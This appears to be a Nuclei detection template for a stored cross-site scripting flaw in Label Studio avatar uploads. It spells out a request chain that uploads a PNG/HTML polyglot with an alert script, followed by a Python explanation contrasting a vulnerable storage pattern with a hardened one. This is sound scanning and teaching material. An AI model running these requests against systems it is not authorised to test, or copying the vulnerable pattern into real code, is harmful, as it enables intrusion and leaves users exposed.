id: CVE-2023-47115

info:
  name: Label Studio - Cross-Site Scripting
  author: isacaya
  severity: high
  description: |
    Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that can be exploited when an authenticated user uploads a crafted image file as their avatar; the file is then served as an HTML document by the website.
  impact: |
    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
  remediation: |
    Update to version 1.9.2.
  reference:
    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
    - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2023-47115
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 6
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,xss,authenticated,intrusive,label-studio

http:
  - raw:
      # 1. Fetch the login page to obtain a CSRF token for the signup form.
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      # 2. Self-register a throwaway account (the vulnerability needs an authenticated user).
      - |
        POST /user/signup/?&next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false

      # 3. Look up the numeric id of the new user.
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      # 4. Upload the avatar: a PNG signature and IHDR chunk followed by an IDAT chunk whose
      #    payload is <script>alert(document.domain)</script>. The part is declared image/png
      #    but carries a .html filename, which is what the server later uses to pick the MIME type.
      - |
        POST /api/users/{{id}}/avatar/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF

        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
        Content-Type: image/png

        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF--

      # 5. Read back the stored avatar path from the user profile.
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      # 6. Request the avatar; a vulnerable instance serves it as text/html.
      - |
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: csrftoken
        internal: true
        attribute: value
        xpath:
          - '/html/body/div/form/input'

      - type: json
        part: body
        name: id
        internal: true
        json:
          - '.id'

      - type: json
        part: body
        name: filename
        internal: true
        json:
          - '.avatar'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'text/html')"
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950
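The template's upload step (a body that starts with the PNG signature but carries a `.html` filename) only works because the file is later served with a Content-Type derived from its stored extension, which is what Django's development `serve` view does via `mimetypes.guess_type()`. The following is an added example, not code from the template or from Label Studio: it builds the same kind of PNG/HTML polyglot the template sends, shows the vulnerable "keep the client filename" storage pattern next to a hardened one that derives the extension from verified content, and reports the Content-Type each would be served with. All function names, the `ALLOWED_SIGNATURES` table and the `avatar-<id>` naming are assumptions made for the illustration.

```python
"""Why a PNG uploaded as 'nuclei.html' turns into stored XSS when files are served by extension."""
import mimetypes
import os
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_png_html_polyglot(script: bytes = b"<script>alert(document.domain)</script>") -> bytes:
    """Constructed sample input with the same shape as the template's hex_decode() payload:
    PNG signature, a 9x8 RGB IHDR, then an IDAT chunk whose payload is HTML rather than
    deflated pixels. It passes a magic-byte check, and a browser told it is text/html
    renders the <script> element."""
    ihdr = _chunk(b"IHDR", struct.pack(">IIBBBBB", 9, 8, 8, 2, 0, 0, 0))
    idat = _chunk(b"IDAT", script)
    return PNG_SIGNATURE + ihdr + idat


def looks_like_png(data: bytes) -> bool:
    return data.startswith(PNG_SIGNATURE)


# --- vulnerable pattern (assumed for illustration) ------------------------------------
def vulnerable_store(upload_name: str, data: bytes) -> str:
    """Validates the content but keeps the client-supplied filename, extension included."""
    if not looks_like_png(data):
        raise ValueError("not a PNG")
    return os.path.basename(upload_name)  # e.g. "nuclei.html"


def served_content_type(stored_name: str) -> str:
    """Mirror of how django.views.static.serve picks a type: by extension of the stored path."""
    ctype, _ = mimetypes.guess_type(stored_name)
    return ctype or "application/octet-stream"


# --- hardened pattern (assumed for illustration) --------------------------------------
ALLOWED_SIGNATURES = {
    PNG_SIGNATURE: ".png",
    b"\xff\xd8\xff": ".jpg",
}


def hardened_store(upload_name: str, data: bytes, user_id: int) -> str:
    """Derive the extension from the verified content; never reuse the upload name."""
    for signature, ext in ALLOWED_SIGNATURES.items():
        if data.startswith(signature):
            return f"avatar-{user_id}{ext}"
    raise ValueError("unsupported image type")


def response_headers(stored_name: str) -> dict:
    """Headers to serve an avatar with: explicit type plus nosniff so the browser
    cannot second-guess an image as HTML even if the body contains markup."""
    return {
        "Content-Type": served_content_type(stored_name),
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    payload = build_png_html_polyglot()
    weak = vulnerable_store("nuclei.html", payload)
    safe = hardened_store("nuclei.html", payload, user_id=7)
    print(weak, "->", served_content_type(weak))   # nuclei.html -> text/html
    print(safe, "->", response_headers(safe))      # avatar-7.png -> image/png + nosniff
```

The hardened variant still stores the polyglot bytes; that is acceptable because the file is now served as `image/png` with `nosniff`, so the embedded script is never interpreted. Checking the magic bytes alone, as `vulnerable_store` does, is not a fix: the template's payload is built precisely to pass that check.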